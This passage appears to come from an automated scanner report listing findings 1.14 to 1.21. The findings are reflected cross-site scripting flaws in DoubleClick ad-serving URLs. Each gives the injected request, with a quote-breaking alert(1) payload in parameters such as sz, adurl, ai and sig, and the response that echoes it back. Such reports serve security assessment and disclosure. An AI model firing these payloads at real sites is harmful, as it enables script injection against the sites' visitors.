User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:17:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7933

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
zOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1http://www.adobe.com/products/creativesuite/design?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc03"-alert(1)-"53df0e3547d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:16:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7943

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547dhttp://www.adobe.com/products/photoshop/photoshop/?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b10"-alert(1)-"313bfda1deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/6c/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 588b5"-alert(1)-"bbb21bc460e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4924

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
.net/click%3Bh%3Dv8/3aae/7/69/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460ehttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c47f2"-alert(1)-"54049c07273 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7835
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 13:21:34 GMT
Expires: Mon, 14 Feb 2011 13:21:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
GFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273http://embassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml?WT.mc_id=z1ECNCAA2ES3D4H5MoreReason40543&cssiteid=1004575&csdartid=5784169940013199");
var fscUrl = url;
var fscUr
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1417b"-alert(1)-"b9c926877f7 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4
...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 230d9"-alert(1)-"981c7121fd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7887

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csdartid%3D5784169940013170");
var
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb08b"-alert(1)-"4523e8dc99a was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5More
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 862c5"-alert(1)-"b9cec4b80de was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:23 GMT
Cache-Control: private, x-gzip-ok=""
